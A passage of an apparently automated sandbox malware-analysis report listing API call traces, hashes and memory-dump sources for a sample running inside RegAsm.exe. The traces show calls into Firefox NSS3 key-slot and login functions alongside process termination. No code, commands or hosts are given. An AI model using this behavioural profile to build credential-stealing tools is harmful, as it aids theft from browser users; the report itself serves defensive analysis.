                                                                                  • Part of subcall function 6C7C14B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C7C1248,6C7C1248,?), ref: 6C7C14C9
                                                                                  • Part of subcall function 6C7C14B0: memcpy.VCRUNTIME140(?,6C7C1248,00000000,?,6C7C1248,?), ref: 6C7C14EF
                                                                                  • Part of subcall function 6C7BEEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C7BEEE3
                                                                                • CreateFileW.KERNEL32 ref: 6C7EF4FD
                                                                                • GetFileInformationByHandle.KERNEL32(00000000), ref: 6C7EF523
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
                                                                                • String ID: \oleacc.dll
                                                                                APIs
                                                                                • SetLastError.KERNEL32(00000000), ref: 6C817526
                                                                                • __Init_thread_footer.LIBCMT ref: 6C817566
                                                                                • __Init_thread_footer.LIBCMT ref: 6C817597
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Init_thread_footer$ErrorLast
                                                                                • String ID: UnmapViewOfFile2$kernel32.dll
                                                                                APIs
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 0040DECC
                                                                                  • Part of subcall function 0041E560: std::exception::exception.LIBCMT ref: 0041E575
                                                                                  • Part of subcall function 0041E560: __CxxThrowException@8.LIBCMT ref: 0041E58A
                                                                                  • Part of subcall function 0041E560: std::exception::exception.LIBCMT ref: 0041E59B
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 0040DEEE
                                                                                • memcpy.MSVCRT ref: 0040DF2B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throwmemcpy
                                                                                • String ID: invalid string position$string too long
                                                                                APIs
                                                                                • strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6C8C0BDE), ref: 6C8C0DCB
                                                                                • strrchr.VCRUNTIME140(00000000,0000005C,?,6C8C0BDE), ref: 6C8C0DEA
                                                                                • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6C8C0BDE), ref: 6C8C0DFC
                                                                                • PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6C8C0BDE), ref: 6C8C0E32
                                                                                Strings
                                                                                • %s incr => %d (find lib), xrefs: 6C8C0E2D
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: strrchr$Print_stricmp
                                                                                • String ID: %s incr => %d (find lib)
                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,Version: ,0042654E), ref: 0040FC46
                                                                                • HeapAlloc.KERNEL32(00000000,?,00000000,?,Version: ,0042654E), ref: 0040FC4D
                                                                                • GetLocalTime.KERNEL32(00000000,?,00000000,?,Version: ,0042654E), ref: 0040FC59
                                                                                • wsprintfA.USER32 ref: 0040FC84
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AllocLocalProcessTimewsprintf
                                                                                • String ID: NeB
                                                                                APIs
                                                                                • LoadLibraryW.KERNEL32(ntdll.dll,?,6C81C0E9), ref: 6C81C418
                                                                                • GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C81C437
                                                                                • FreeLibrary.KERNEL32(?,6C81C0E9), ref: 6C81C44C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                • String ID: NtQueryVirtualMemory$ntdll.dll
                                                                                APIs
                                                                                  • Part of subcall function 6C863C40: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C863C66
                                                                                  • Part of subcall function 6C863C40: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(000000FD,?), ref: 6C863D04
                                                                                • memcpy.VCRUNTIME140(?,?,?), ref: 6C876DC0
                                                                                • memcpy.VCRUNTIME140(?,?,?), ref: 6C876DE5
                                                                                  • Part of subcall function 6C878010: _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C87807D
                                                                                  • Part of subcall function 6C878010: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8780D1
                                                                                  • Part of subcall function 6C878010: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C87810E
                                                                                  • Part of subcall function 6C878010: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C878140
                                                                                • memcpy.VCRUNTIME140(00000004,00000004,00000000), ref: 6C876E7E
                                                                                • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C876E96
                                                                                • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C876EC2
                                                                                  • Part of subcall function 6C877D70: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C877E27
                                                                                  • Part of subcall function 6C877D70: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C877E67
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: _byteswap_ulong$memcpy$_byteswap_ushort
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32 ref: 6C8CEDFD
                                                                                • calloc.MOZGLUE(00000001,00000000), ref: 6C8CEE64
                                                                                • PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6C8CEECC
                                                                                • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C8CEEEB
                                                                                • free.MOZGLUE(?), ref: 6C8CEEF6
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorValuecallocfreememcpy
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0041105B
                                                                                • memset.MSVCRT ref: 0041107D
                                                                                  • Part of subcall function 00410CAC: GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,004110AA,00000000,?,00000000,?), ref: 00410CB7
                                                                                  • Part of subcall function 00410CAC: HeapAlloc.KERNEL32(00000000,?,004110AA,00000000,?,00000000,?), ref: 00410CBE
                                                                                  • Part of subcall function 00410CAC: wsprintfW.USER32 ref: 00410CCF
                                                                                • OpenProcess.KERNEL32(00001001,00000000,?,?,?,?,00000000,?), ref: 00411104
                                                                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000000,?), ref: 00411112
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 00411119
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$Heap$AllocCloseH_prologHandleOpenTerminatememsetwsprintf
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 6C7BB532
                                                                                • moz_xmalloc.MOZGLUE(?), ref: 6C7BB55B
                                                                                • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C7BB56B
                                                                                • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C7BB57E
                                                                                • free.MOZGLUE(00000000), ref: 6C7BB58F
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
                                                                                APIs
                                                                                • PORT_ArenaMark_Util.NSS3(00000000,?,6C8D3FFF,00000000,?,?,?,?,?,6C8D1A1C,00000000,00000000), ref: 6C8DADA7
                                                                                  • Part of subcall function 6C9314C0: TlsGetValue.KERNEL32 ref: 6C9314E0
                                                                                  • Part of subcall function 6C9314C0: EnterCriticalSection.KERNEL32 ref: 6C9314F5
                                                                                  • Part of subcall function 6C9314C0: PR_Unlock.NSS3 ref: 6C93150D
                                                                                • PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6C8D3FFF,00000000,?,?,?,?,?,6C8D1A1C,00000000,00000000), ref: 6C8DADB4
                                                                                  • Part of subcall function 6C9310C0: TlsGetValue.KERNEL32(?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C9310F3
                                                                                  • Part of subcall function 6C9310C0: EnterCriticalSection.KERNEL32(?,?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C93110C
                                                                                  • Part of subcall function 6C9310C0: PL_ArenaAllocate.NSS3(?,?,?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C931141
                                                                                  • Part of subcall function 6C9310C0: PR_Unlock.NSS3(?,?,?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C931182
                                                                                  • Part of subcall function 6C9310C0: TlsGetValue.KERNEL32(?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C93119C
                                                                                • SECITEM_CopyItem_Util.NSS3(00000000,?,6C8D3FFF,?,?,?,?,6C8D3FFF,00000000,?,?,?,?,?,6C8D1A1C,00000000), ref: 6C8DADD5
                                                                                  • Part of subcall function 6C92FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C928D2D,?,00000000,?), ref: 6C92FB85
                                                                                  • Part of subcall function 6C92FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C92FBB1
                                                                                • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C9F94B0,?,?,?,?,?,?,?,?,6C8D3FFF,00000000,?), ref: 6C8DADEC
                                                                                  • Part of subcall function 6C92B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CA018D0,?), ref: 6C92B095
                                                                                • PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C8D3FFF), ref: 6C8DAE3C
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
                                                                                APIs
                                                                                • PK11_GetInternalKeySlot.NSS3(?,?,?,6C912E62,?,?,?,?,?,?,?,00000000,?,?,?,6C8E4F1C), ref: 6C8F8EA2
                                                                                  • Part of subcall function 6C91F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C91F854
                                                                                  • Part of subcall function 6C91F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C91F868
                                                                                  • Part of subcall function 6C91F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C91F882
                                                                                  • Part of subcall function 6C91F820: free.MOZGLUE(04C483FF,?,?), ref: 6C91F889
                                                                                  • Part of subcall function 6C91F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C91F8A4
                                                                                  • Part of subcall function 6C91F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C91F8AB
                                                                                  • Part of subcall function 6C91F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C91F8C9
                                                                                  • Part of subcall function 6C91F820: free.MOZGLUE(280F10EC,?,?), ref: 6C91F8D0
                                                                                • PK11_IsLoggedIn.NSS3(?,?,?,6C912E62,?,?,?,?,?,?,?,00000000,?,?,?,6C8E4F1C), ref: 6C8F8EC3
                                                                                • TlsGetValue.KERNEL32(?,?,?,6C912E62,?,?,?,?,?,?,?,00000000,?,?,?,6C8E4F1C), ref: 6C8F8EDC
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,6C912E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6C8F8EF1
                                                                                • PR_Unlock.NSS3 ref: 6C8F8F20
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
                                                                                APIs
                                                                                  • Part of subcall function 6C911E10: TlsGetValue.KERNEL32 ref: 6C911E36
                                                                                  • Part of subcall function 6C911E10: EnterCriticalSection.KERNEL32(?,?,?,6C8EB1EE,2404110F,?,?), ref: 6C911E4B
                                                                                  • Part of subcall function 6C911E10: PR_Unlock.NSS3 ref: 6C911E76
                                                                                • free.MOZGLUE(?,6C8FD079,00000000,00000001), ref: 6C8FCDA5
                                                                                • PK11_FreeSymKey.NSS3(?,6C8FD079,00000000,00000001), ref: 6C8FCDB6
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C8FD079,00000000,00000001), ref: 6C8FCDCF
                                                                                • DeleteCriticalSection.KERNEL32(?,6C8FD079,00000000,00000001), ref: 6C8FCDE2
                                                                                • free.MOZGLUE(?), ref: 6C8FCDE9
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
                                                                                APIs
                                                                                  • Part of subcall function 6C965B40: PR_GetIdentitiesLayer.NSS3 ref: 6C965B56
                                                                                • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C962CEC
                                                                                  • Part of subcall function 6C97C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C97C2BF
                                                                                • PR_EnterMonitor.NSS3(?), ref: 6C962D02
                                                                                • PR_EnterMonitor.NSS3(?), ref: 6C962D1F
                                                                                • PR_ExitMonitor.NSS3(?), ref: 6C962D42
                                                                                • PR_ExitMonitor.NSS3(?), ref: 6C962D5B
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                • String ID:
                                                                                • API String ID: 1593528140-0
                                                                                • Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                • Instruction ID: d0b17f297717f9037ebf316d7175e4a5de1100ab6f7eae09d154b567bf3493e7
                                                                                • Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                • Instruction Fuzzy Hash: 8101A1B1A00A009FF7309F2AFC41BD7B7A5EF65318F044535E85D86B60E632E8158692
                                                                                APIs
                                                                                  • Part of subcall function 6C965B40: PR_GetIdentitiesLayer.NSS3 ref: 6C965B56
                                                                                • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C962D9C
                                                                                  • Part of subcall function 6C97C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C97C2BF
                                                                                • PR_EnterMonitor.NSS3(?), ref: 6C962DB2
                                                                                • PR_EnterMonitor.NSS3(?), ref: 6C962DCF
                                                                                • PR_ExitMonitor.NSS3(?), ref: 6C962DF2
                                                                                • PR_ExitMonitor.NSS3(?), ref: 6C962E0B
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                • String ID:
                                                                                • API String ID: 1593528140-0
                                                                                • Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                • Instruction ID: 9368be2eb6e4bd340a2208545ad8a3c55ba1d9ab78ebbad8f359128d84463bf9
                                                                                • Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                • Instruction Fuzzy Hash: 5501A1B1A00A009FFB319F2AFC05BD7B7A5EB65318F040435E85D86F50D632E82586A2
                                                                                APIs
                                                                                  • Part of subcall function 6C8E3090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C8FAE42), ref: 6C8E30AA
                                                                                  • Part of subcall function 6C8E3090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C8E30C7
                                                                                  • Part of subcall function 6C8E3090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C8E30E5
                                                                                  • Part of subcall function 6C8E3090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C8E3116
                                                                                  • Part of subcall function 6C8E3090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C8E312B
                                                                                  • Part of subcall function 6C8E3090: PK11_DestroyObject.NSS3(?,?), ref: 6C8E3154
                                                                                  • Part of subcall function 6C8E3090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8E317E
                                                                                • SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6C8D99FF,?,?,?,?,?,?,?,?,?,6C8D2D6B,?), ref: 6C8FAE67
                                                                                • SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6C8D99FF,?,?,?,?,?,?,?,?,?,6C8D2D6B,?), ref: 6C8FAE7E
                                                                                • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C8D2D6B,?,?,00000000), ref: 6C8FAE89
                                                                                • PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6C8D2D6B,?,?,00000000), ref: 6C8FAE96
                                                                                • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6C8D2D6B,?,?), ref: 6C8FAEA3
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
                                                                                • String ID:
                                                                                • API String ID: 754562246-0
                                                                                • Opcode ID: f6c8b1e5f432e178b4e3be8d3adf61e327633a312d483cf2fd84d8b2c7bd55cb
                                                                                • Instruction ID: 1d7f25fceeeb9324d9fdbac758806b5c6681a71dc474806b44da428564b6bf55
                                                                                • Opcode Fuzzy Hash: f6c8b1e5f432e178b4e3be8d3adf61e327633a312d483cf2fd84d8b2c7bd55cb
                                                                                • Instruction Fuzzy Hash: DD012862B1402857E721912CEE81BEF31588B97AEDF080D31E925C7B01F715DD0742E3
                                                                                APIs
                                                                                • DeleteCriticalSection.KERNEL32(6C9EA6D8), ref: 6C9EAE0D
                                                                                • free.MOZGLUE(?), ref: 6C9EAE14
                                                                                • DeleteCriticalSection.KERNEL32(6C9EA6D8), ref: 6C9EAE36
                                                                                • free.MOZGLUE(?), ref: 6C9EAE3D
                                                                                • free.MOZGLUE(00000000,00000000,?,?,6C9EA6D8), ref: 6C9EAE47
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: free$CriticalDeleteSection
                                                                                • String ID:
                                                                                • API String ID: 682657753-0
                                                                                • Opcode ID: ad20d873526ebcc1c0a45c64805420b2f8e07b41ccd11575c50fd4f67a2a9625
                                                                                • Instruction ID: 77136b32ca1520f38dab7419313b6a6874862540515968400d66f1d1dc75205c
                                                                                • Opcode Fuzzy Hash: ad20d873526ebcc1c0a45c64805420b2f8e07b41ccd11575c50fd4f67a2a9625
                                                                                • Instruction Fuzzy Hash: 14F0F675201B16A7DB059F68D8099277B7CBF8A778718432CE12A83950D739E112C7D1
                                                                                APIs
                                                                                • __getptd.LIBCMT ref: 0041A15D
                                                                                  • Part of subcall function 0041A334: __getptd_noexit.LIBCMT ref: 0041A337
                                                                                  • Part of subcall function 0041A334: __amsg_exit.LIBCMT ref: 0041A344
                                                                                • __getptd.LIBCMT ref: 0041A174
                                                                                • __amsg_exit.LIBCMT ref: 0041A182
                                                                                • __lock.LIBCMT ref: 0041A192
                                                                                • __updatetlocinfoEx_nolock.LIBCMT ref: 0041A1A6
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                • String ID:
                                                                                • API String ID: 938513278-0
                                                                                • Opcode ID: 8c78c0af6140777fa1bdc48fcf2f5a2d54df20f957d87e2b9a9cf5d36f6c81fa
                                                                                • Instruction ID: 4e3a2c4d0a1e278f0847d9c725dca8c59e2d9a2086bcf68a1c39e98a36d27e27
                                                                                • Opcode Fuzzy Hash: 8c78c0af6140777fa1bdc48fcf2f5a2d54df20f957d87e2b9a9cf5d36f6c81fa
                                                                                • Instruction Fuzzy Hash: 8FF06232A46610AADB25BB665806BCD32905F00729F54010FF410662C2CA7C59D1CA5F
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00407898
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                • lstrlenA.KERNEL32(00000000), ref: 00407DE7
                                                                                • lstrlenA.KERNEL32(00000000), ref: 00407DFB
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                  • Part of subcall function 004063B1: _EH_prolog.MSVCRT ref: 004063B6
                                                                                  • Part of subcall function 004063B1: memcmp.MSVCRT ref: 004063DC
                                                                                  • Part of subcall function 004063B1: memset.MSVCRT ref: 0040640B
                                                                                  • Part of subcall function 004063B1: LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406440
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                  • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                  • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                  • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$lstrcpy$lstrlen$lstrcat$AllocCreateLocalObjectSingleThreadWaitmemcmpmemset
                                                                                • String ID: #
                                                                                • API String ID: 3207582090-1885708031
                                                                                • Opcode ID: 2bce3dd55c3cf3d5428d66e77e3048d3e6e068f414916bbddf1a15f1dcc301b1
                                                                                • Instruction ID: 90a0b065f2ce581d2774c055680d4a4ab4ac60e8fee4b98af290d1c90ab0784c
                                                                                • Opcode Fuzzy Hash: 2bce3dd55c3cf3d5428d66e77e3048d3e6e068f414916bbddf1a15f1dcc301b1
                                                                                • Instruction Fuzzy Hash: 41126C71804249EADB15EBE0C956BEEBB74AF28308F5040BEE406725C2DF78274DDB65
                                                                                APIs
                                                                                  • Part of subcall function 6C7ECBE8: GetCurrentProcess.KERNEL32(?,6C7B31A7), ref: 6C7ECBF1
                                                                                  • Part of subcall function 6C7ECBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C7B31A7), ref: 6C7ECBFA
                                                                                • EnterCriticalSection.KERNEL32(6C83E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C7ED1C5), ref: 6C7DD4F2
                                                                                • LeaveCriticalSection.KERNEL32(6C83E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C7ED1C5), ref: 6C7DD50B
                                                                                  • Part of subcall function 6C7BCFE0: EnterCriticalSection.KERNEL32(6C83E784), ref: 6C7BCFF6
                                                                                  • Part of subcall function 6C7BCFE0: LeaveCriticalSection.KERNEL32(6C83E784), ref: 6C7BD026
                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C7ED1C5), ref: 6C7DD52E
                                                                                • EnterCriticalSection.KERNEL32(6C83E7DC), ref: 6C7DD690
                                                                                • LeaveCriticalSection.KERNEL32(6C83E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C7ED1C5), ref: 6C7DD751
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
                                                                                • String ID: MOZ_CRASH()
